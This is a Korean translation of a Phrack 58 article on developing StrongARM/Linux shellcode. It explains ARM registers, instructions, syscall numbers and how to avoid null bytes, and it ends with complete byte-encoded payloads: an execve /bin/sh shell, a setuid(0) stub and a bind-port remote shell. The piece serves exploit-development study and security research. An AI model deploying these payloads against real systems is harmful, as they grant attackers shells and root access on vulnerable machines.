************************************************************************ 
                제목: StrongARM/Linux 쉘코드 개발(프랙 58호) 
                번역: vangelis(http://www.wowhacker.org) 

                * 혹시라도 오역이나 오타 있으면 말씀해주시길 바랍니다. 
************************************************************************ 




                                 ==Phrack Inc.== 

               Volume 0x0b, Issue 0x3a, Phile #0x0a of 0x0e 

|=--------------=[ StrongARM/Linux 쉘코드 개발하기 ]=---------------=| 
|=-----------------------------------------------------------------------=| 
|=--------------------=[ funkysh <funkysh@sm.pl> ]=----------------------=| 


                             "Into my ARMs" 


---[  도입
이 논문은 StrongARM 리눅스 쉘코드를 작성하는데 필요한 정보를 담고 있다. 이 
논문에서 제시된 모든 예들은 데비안 리눅스가 실행되는 Intel StrongARM-1110 
프로세스가 탑재된 Compaq iPAQ H3650에서 개발되었다. 이 문서가 완벽한 ARM 
아키텍처 가이드나 어셈블리어 튜토리얼도 아니라는 것을 주목해야 하며, 하지만 
주요한 버그를 포함하고 있지 않기를 바라지만 StrongARM은 다른 ARM과 완전히 
호환되지는 않는다는 것을 주목할 필요는 있을 것이다.(하지만 이것이 문제가 될 
거라고는 생각지 않는다.) 이 문서는 9 부분으로 나누어져 있다. 



  * ARM의 간단한 역사 
  * ARM 아키텍처 
  * ARM 레지스터 
  * 명령 셋 
  * 시스템 호출 
  * 일반적인 오퍼레이션 
  * Null 피하기 
  * 예제 코드 
  * 참고문헌 



---[  ARM의 간단한 역사 

최초의 ARM 프로세스(ARM은 Advanced RISC Machine을 의미)는 80년대 중반에 Acorn 
Computer Group에 의해서 고안되고 제조되었다. 시작할 때의 목적은 낮은 전력 소비로 
낮은 비용의 프로세스와 높은 실행능력과 전력 효율을 구축하기 위한 것이었다.  
1990년에 Acorn은 애플사와 RISC Machines Ltd.란 회사를 세웠다. 요즘은 ARM Ltd사는 
프로세스를 만들지는 않고 디자인하여 제 3의 제조업체에게 이 디자인을 라이센스화만 
하고 있다. ARM 테크놀로지는 Lucent, 3Com, HP, IBM, Sony, 그리고 많은 다른 회사를 
포함해 거대한 회사에 의해 현재 라이센스화되었다. 
  StrongARM은 ARM 프로세스의 명령셋을 사용하는 디자인에 대한 ARM Ltd와 Digital의 
작업 결과이지만 그것은  Alpha 시리즈의 칩 기술로 만들어졌다. Digital은 칩 
제조부분을 인텔사에 팔아버렸다. SA-110와 SA-1110를 포함하여 인텔사의 
StrongARM은 [1]에 정의된 ARM v4 아키텍처를 구현하고 있다. 

---[  ARM 아키텍처 
         
ARM은 RISC 아키텍처에 디자인된 32비트 마이크로프로세스인데, 이것은 x86 또는 
m68k와 같은 전형적인 CISC에 반대되는 명령셋을 줄였다는 것을 의미한다. 줄어든 
명령셋의 장점들은 보기 파이프라이닝 또는 hard-wired logic을 위해 사용되는 속도를 
최적화하는 가능성을 포함하고 있다. 
  또한 명령 및 어드레싱 모드는 대부분의 명령어들에 대해 동일하게 만들어질 수 
있다. ARM은 데이터 처리가 직접적으로 메모리 내용이 아니라 레지스터 내용에만 
작동하는 로드/저장 아키텍처이다. 또한 Load and Store Multiple instruction과 
모든 명령어의 조건부 실행과 같은 추가 기능을 지원한다. 분명 모든 명령은 
32비트의 길이를 가지고 있다. 
   

---[  ARM 레지스트 

ARM은 16개의 가시적인 32비트 레지스트(r0에서 r14 및 r15(pc))를 가지고 있다. 
간단히 말하면 13개의 '일반적인 목적'의 레지스트인 r0에서 r12까지와 3개의 
'특별한' 목적(사실 15개 모두 일반적인 목적을 위한 것이다)을 위해 예약되어 있다. 
       
   r13 (sp)     -  스택 포인터 
   r14 (lr)     -  링크 레지스터 
   r15 (pc/psr) -  프로그램 counter/status 레지스터 

sp로 알려진 레지스터 r13은 스택 포인터로 사용되고, 링크 레지스터와 더불어 둘 다 
ARM 어셈블리어에서 함수 또는 서브루틴을 구현하는데 사용된다. lr로 알려진 링크 
레지스터 r14는 서버루틴 리턴 어드레스를 담기 위해 사용된다. 서브루틴 호출이 예를 
들어 bl 명령에 의해 수행될 때 r14는 서버루틴의 리턴 어드레스로 설정된다. 그런 
다음 서버루틴 리턴은 r14를 프로그램 카운터 안으로 다시 복사함으로써 수행된다. 
ARM 상에서 스택은 낮은 메모리 주소로 자라고, 스택 포인터는 그것에 쓰여진 마지막 
아이템을 가리키는데, 이것은 "full descending stack"이라고 불린다. 예를 들어, 
스택에 0x41을 위치시키고, 그런 다음 0x42를 위치시키는 것은 다음과 같다. 
   


         메모리 주소   스택 값 

                      +------------+ 
          0xbffffdfc: | 0x00000041 | 
                      +------------+ 
   sp ->  0xbffffdf8: | 0x00000042 | 
                      +------------+ 


---[  명령 셋 

위에서 쓰여진 것처럼 대부분의 다른 RISC CPU들과 마찬가지로 ARM은 고정된 길이(이 
경우 32 비트)의 명령을 가지고 있다. 또한 모든 명령은 조건부라는 것도 언급되었다. 
그래서 비트 구현에서 위의 4개의 비트(31~28)는 명령이 실행되는 상황은 지정하는데 
사용된다.   

우리에게 흥미로운 명령은 4가지로 나누어질 수 있다. 
  - branch 명령 
  - 로드 및 저장 명령 
  - 데이터 처리 명령 
  - 예외 생성 명령 

Status register에 대한 것은 여기서 제외했다. 

1. Branch 명령 
    ------------ 

두 가지 branch 명령이 있다: 

               branch:  b <24 bit signed offset> 

     branch with link:  bl <24 bit signed offset> 


'branch with link'를 실행하는 것은 다음 명령의 주소와 함께 'lr'을 설정하는 
결과를 가져온다. 


2. 데이터 처리 명령 
    ---------------- 

데이터 처리 명령은 일반적으로 3가지 주소의 포맷을 사용한다. 


<opcode mnemonic> <destination> <operand 1> <operand 2> 

Destination은 항상 레지스터이며, operand 1은 r0에서부터 r15 레지스터까지 중의 
하나이어야만 하고, operand 2는 레지스터, 이동된 레지스터 또는 직접적인 값이 될 
수도 있다. 


몇 가지 예들: 

  -----------------------------+----------------+--------------------+ 
              addition:   add  | add r1,r1,#65  | set r1 = r1 + 65   | 
          substraction:   sub  | sub r1,r1,#65  | set r1 = r1 - 65   | 
           logical AND:   and  | and r0,r1,r2   | set r0 = r1 AND r2 | 
  logical exclusive OR:   eor  | eor r0,r1,#65  | set r0 = r1 XOR r2 | 
            logical OR:   orr  | orr r0,r1,r2   | set r0 = r1 OR r2  | 
                  move:   mov  | mov r2,r0      | set r2 = r0        | 


3. 로드 및 저장 명령 
    ----------------- 
   
load register from memory:  ldr rX, <address>     

 예: ldr r0, [r1]는 r1에서 지정된 어드레스로부터 32비트의 단어와 함께 r0을 
로드하며, 또한 8비트를 로딩하는 것에 대한 책임이 있는 ldrb 명령도 있으며, 
메모리에 레지스터를 저장하는 것을 위한 유사한 명령도 있다. 
                      
  store register in memory:  str rX, <address>     (store 32 bits) 
                             strb rX, <address>    (store 8 bits) 

  ARM는 또한 다양한 레지스터들을 저장하고 로딩하는 것도 지원하는데, 최적화라는 
관점에서는 아주 흥미로운 기능이며, 다음은 stm(메모리에 다양한 레지스터를 
저장한다)이다. 

stm <base register><stack type>(!),{register list} 

  베이스 레지스터는 어떤 레지스터에 의해서도 사용될 수 있지만 전형적으로 스택 
포인터가 사용된다. 예를 들어, stmfd sp!, {r0-r3, r6}는 레지스터 r0, r1, r2, r3 
그리고 r6을 스택에 저장하며(full descending 모드로 - stm 다음에 추가 연상기호 
"fd"를 주목할 것), 스택 포인터는 r0 레지스터가 저장된 곳을 가리킬 것이다. 
메모리로부터 다양한 레지스터를 로딩하기 위한 명령은 ldm이다. 


4. 예외생성 명령 
    ------------- 

Software interrupt: swi <number>는 우리에게 유일하게 흥미로운 부분인데, 
소프트웨어 인터럽트 예외를 수행하며, 그것은 시스템 호출로 사용된다. 
이 장에서 제시된 명령 목록은 완전한 것이 아니며, 전체 셋은 [1]로부터 구할 수 
있다. 



---[  시스템 호출 

StronARM 프로세스가 탑재된 리눅스에서 syscall 베이스는 0x900000으로 이동하는데, 
이것은 쉘코드 작성자들에게는 좋은 정보는 아니다. 왜냐하면 제로 바이트를 포함한 
명령 opcode를 다루어야 하기 때문이다. 

보기  "exit" syscall은 다음과 같다. 

               swi 0x900001   [ 0xef900001 ] 

다음은 쉘코드를 작성할 때 사용될 수 있는 syscall의 목록이다.(syscall의 리턴값은 
보통 r0에 저장된다.) 

       execve: 
       ------- 
               r0 = const char *filename 
               r1 = char *const argv[] 
               r2 = char *const envp[] 
      call number = 0x90000b 


       setuid: 
       ------- 
               r0 = uid_t uid 
      call number = 0x900017 


         dup2: 
         ----- 
               r0 = int oldfd 
               r1 = int newfd 
      call number = 0x90003f 


       socket: 
       ------- 
               r0 = 1 (SYS_SOCKET) 
               r1 = ptr to int domain, int type, int protocol 
      call number = 0x900066 (socketcall) 


         bind: 
         ----- 
               r0 = 2 (SYS_BIND) 
               r1 = ptr to int  sockfd, struct sockaddr *my_addr, 
                    socklen_t addrlen 
      call number = 0x900066 (socketcall) 


       listen: 
       ------- 
               r0 = 4 (SYS_LISTEN) 
               r1 = ptr to int s, int backlog 
      call number = 0x900066 (socketcall) 


       accept: 
       ------- 
               r0 = 5 (SYS_ACCEPT) 
               r1 = ptr int s,  struct  sockaddr  *addr, 
                    socklen_t *addrlen 
      call number = 0x900066 (socketcall) 



---[  일반적인 오퍼레이션 


높은 값 로딩하기 
--------------- 
ARM 상의 모든 명령들이 opcode, condition, 그리고 레지스트 번호들을 위한 공간을 
포함해 32비트 단어를 차지하기 때문에 하나의 명령으로 레지스터 속으로 직접적으로 
높은 값을 로딩할 방법이 없다. 이 문제는 'shifting'이라고 불리는 기능에 의해 
해결될 수 있다. ARM 어셈블러는 여섯 개의 다른 shift 타입에 대해 책임을 지고 있는 
여섯 개의 추가 연상기호를 사용한다. 
   

           lsl -  logical shift left 
           asl -  arithmetic shift left 
           lsr -  logical shift right 
           asr -  arithmetic shift right 
           ror -  rotate right 
           rrx -  rotate right with extend 

  Shifter들은 데이터 처리 명령들이나 또는 ldr 및 str 명령과 함께 사용될 수 있다. 
예를 들어, 0x900000으로 r0을 로딩하기 위해 우리는 다음 오퍼레이션을 수행한다. 
   
         mov   r0, #144           ; 0x90 
         mov   r0, r0, lsl #16    ; 0x90 << 16 = 0x900000 


위치 독립 
--------- 
자신의 코드 위치를 획득하는 것은 아주 쉬운데, 이것은 pc가 일반적인 목적의 
레지스터이고, 어떤 순간에라도 읽혀질 수 있거나 아니면 메모리의 어떤 주소 안으로 
jump를 수행하기 위해 32비트 값으로 로딩될 수 있기 때문이다. 
   
예를 들어, 다음을 실행한 이후: 

         sub   r0, pc, #4 

다음 명령의 주소는 레지스트 r0에 저장될 것이다. 

또 다른 한 방법은 링크 명령으로 branch를 실행하는 것이다: 
     
         bl    sss 
         swi   0x900001 
  sss:   mov   r0, lr 
   
이제 r0 은 "swi 0x900001"를 가리킨다. 


루프 
----- 

어떤 명령을 세 번 실행하기 위해 루프를 만들길 원한다고 말해보자. 전형적인 루프는 
다음과 같이 구성된다. 

         mov   r0, #3     <- loop counter 
loop:   ...     
         sub   r0, r0, #1 <- fd = fd -1 
         cmp   r0, #0     <- check if r0 == 0 already 
         bne   loop       <- goto loop if no (if Z flag != 1) 

이 루프는 r0이 0에 도달할 때 우리를 위해 Z 플래그를 설정할 subs 명령을 사용하여 
최적화될 수 있으며, 그래서 우리는 cmp를 제거할 수 있다. 

         mov   r0, #3 
loop:   ... 
         subs  r0, r0, #1 
         bne   loop 


       
Nop 명령 
--------- 

  ARM에서 "mov r0, r0"는 nop으로 사용된다. 하지만 그것은 null들을 포함하고 있어 
어떤 다른 "neutral" 명령은 취약점들에 대한 개념 코드를 입증하기 위해 작성할 때 
사용되어야 하며,  "mov r1, r1"이 한 예이다. 

         mov   r1, r1    [ 0xe1a01001 ] 
           

---[  Null 피하기 

r0 레지스터를 사용하는 어떤 명령도 ARM에 'zero'를 생성하는데, 이것은 보통 그것을 
다른 명령으로 대체하거나 스스로 변경하는 코드를 사용하여 해결될 수 있다. 
   
예를 들어: 
             e3a00041    mov   r0, #65      는 다음으로 대체될 수 있다: 
   
             e0411001    sub   r1, r1, r1 
             e2812041    add   r2, r1, #65 
             e1a00112    mov   r0, r2, lsl r1  (r0 = r2 << 0) 

Syscall은 다음과 같이 패치될 수 있다.: 

             e28f1004    add   r1, pc, #4    <- get address of swi 
             e0422002    sub   r2, r2, r2     
             e5c12001    strb  r2, [r1, #1]  <- patch 0xff with 0x00 
             ef90ff0b    swi   0x90ff0b      <- crippled syscall 

비록 r0 레지스터가 사용되지 않는다 하더라도 Store/Load multiple도 또한 'zero'를 
생성한다: 

             e92d001e    stmfd sp!, {r1, r2, r3, r4} 

다음 섹션에서 제시된 예제 코드에서 나는 링크 레지스터와 함께 저장하기를 
사용했다: 

             e04ee00e    sub   lr, lr, lr 
             e92d401e    stmfd sp!, {r1, r2, r3, r4, lr} 


---[  예제 코드 


/* 
* 47 byte StrongARM/Linux execve() shellcode 
* funkysh 
*/ 

char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */ 
                  "\x1c\x30\x8f\xe2"   /*  add   r3, pc, #28 (0x1c)    */ 
                  "\x04\x30\x8d\xe5"   /*  str   r3, [sp, #4]          */ 
                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */ 
                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */ 
                  "\x07\x20\xc3\xe5"   /*  strb  r2, [r3, #7           */ 
                  "\x04\x30\x8f\xe2"   /*  add   r3, pc, #4            */ 
                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */ 
                  "\x01\x20\xc3\xe5"   /*  strb  r2, [r3, #1]          */ 
                  "\x0b\x0b\x90\xef"   /*  swi   0x90ff0b              */ 
                  "/bin/sh"; 


/* 
* 20 byte StrongARM/Linux setuid() shellcode 
* funkysh 
*/ 

char shellcode[]= "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */ 
                  "\x04\x10\x8f\xe2"   /*  add   r1, pc, #4            */ 
                  "\x12\x02\xa0\xe1"   /*  mov   r0, r2, lsl r2        */ 
                  "\x01\x20\xc1\xe5"   /*  strb  r2, [r1, #1]          */ 
                  "\x17\x0b\x90\xef";  /*  swi   0x90ff17              */ 


/* 
* 203 byte StrongARM/Linux bind() portshell shellcode 
* funkysh 
*/ 

char shellcode[]= "\x20\x60\x8f\xe2"   /*  add   r6, pc, #32           */ 
                  "\x07\x70\x47\xe0"   /*  sub   r7, r7, r7            */ 
                  "\x01\x70\xc6\xe5"   /*  strb  r7, [r6, #1]          */ 
                  "\x01\x30\x87\xe2"   /*  add   r3, r7, #1            */ 
                  "\x13\x07\xa0\xe1"   /*  mov   r0, r3, lsl r7        */ 
                  "\x01\x20\x83\xe2"   /*  add   r2, r3, #1            */ 
                  "\x07\x40\xa0\xe1"   /*  mov   r4, r7                */ 
                  "\x0e\xe0\x4e\xe0"   /*  sub   lr, lr, lr            */ 
                  "\x1c\x40\x2d\xe9"   /*  stmfd sp!, {r2-r4, lr}      */ 
                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */ 
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (socket) */ 
                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */ 
                  "\x35\x70\xc6\xe5"   /*  strb  r7, [r6, #53]         */ 
                  "\x14\x20\xa0\xe3"   /*  mov   r2, #20               */ 
                  "\x82\x28\xa9\xe1"   /*  mov   r2, r2, lsl #17       */ 
                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */ 
                  "\x14\x40\x2d\xe9"   /*  stmfd sp!, {r2,r4, lr}      */ 
                  "\x10\x30\xa0\xe3"   /*  mov   r3, #16               */ 
                  "\x0d\x20\xa0\xe1"   /*  mov   r2, sp                */ 
                  "\x0d\x40\x2d\xe9"   /*  stmfd sp!, {r0, r2, r3, lr} */ 
                  "\x02\x20\xa0\xe3"   /*  mov   r2, #2                */ 
                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */ 
                  "\x0d\x10\xa0\xe1"   /*  mov   r1, sp                */ 
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66       (bind) */ 
                  "\x45\x70\xc6\xe5"   /*  strb  r7, [r6, #69]         */ 
                  "\x02\x20\x82\xe2"   /*  add   r2, r2, #2            */ 
                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */ 
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (listen) */ 
                  "\x5d\x70\xc6\xe5"   /*  strb  r7, [r6, #93]         */ 
                  "\x01\x20\x82\xe2"   /*  add   r2, r2, #1            */ 
                  "\x12\x07\xa0\xe1"   /*  mov   r0, r2, lsl r7        */ 
                  "\x04\x70\x8d\xe5"   /*  str   r7, [sp, #4]          */ 
                  "\x08\x70\x8d\xe5"   /*  str         r7, [sp, #8]          */ 
                  "\x66\xff\x90\xef"   /*  swi   0x90ff66     (accept) */ 
                  "\x10\x57\xa0\xe1"   /*  mov   r5, r0, lsl r7        */ 
                  "\x02\x10\xa0\xe3"   /*  mov   r1, #2                */ 
                  "\x71\x70\xc6\xe5"   /*  strb  r7, [r6, #113]        */ 
                  "\x15\x07\xa0\xe1"   /*  mov   r0, r5, lsl r7 <dup2> */ 
                  "\x3f\xff\x90\xef"   /*  swi   0x90ff3f       (dup2) */ 
                  "\x01\x10\x51\xe2"   /*  subs  r1, r1, #1            */ 
                  "\xfb\xff\xff\x5a"   /*  bpl   <dup2>                */ 
                  "\x99\x70\xc6\xe5"   /*  strb  r7, [r6, #153]        */ 
                  "\x14\x30\x8f\xe2"   /*  add   r3, pc, #20           */ 
                  "\x04\x30\x8d\xe5"   /*  str         r3, [sp, #4]          */ 
                  "\x04\x10\x8d\xe2"   /*  add   r1, sp, #4            */ 
                  "\x02\x20\x42\xe0"   /*  sub   r2, r2, r2            */ 
                  "\x13\x02\xa0\xe1"   /*  mov   r0, r3, lsl r2        */ 
                  "\x08\x20\x8d\xe5"   /*  str   r2, [sp, #8]          */ 
                  "\x0b\xff\x90\xef"   /*  swi         0x900ff0b    (execve) */ 
                  "/bin/sh"; 


---[  참고문헌: 


[1] ARM Architecture Reference Manual - Issue D, 
    2000 Advanced RISC Machines LTD 

[2] Intel StrongARM SA-1110 Microprocessor Developer's Manual, 
    2001 Intel Corporation 

[3] Using the ARM Assembler, 
    1988 Advanced RISC Machines LTD 
     
[4] ARM8 Data Sheet, 
    1996 Advanced RISC Machines LTD 

|=[ EOF ]=---------------------------------------------------------------=|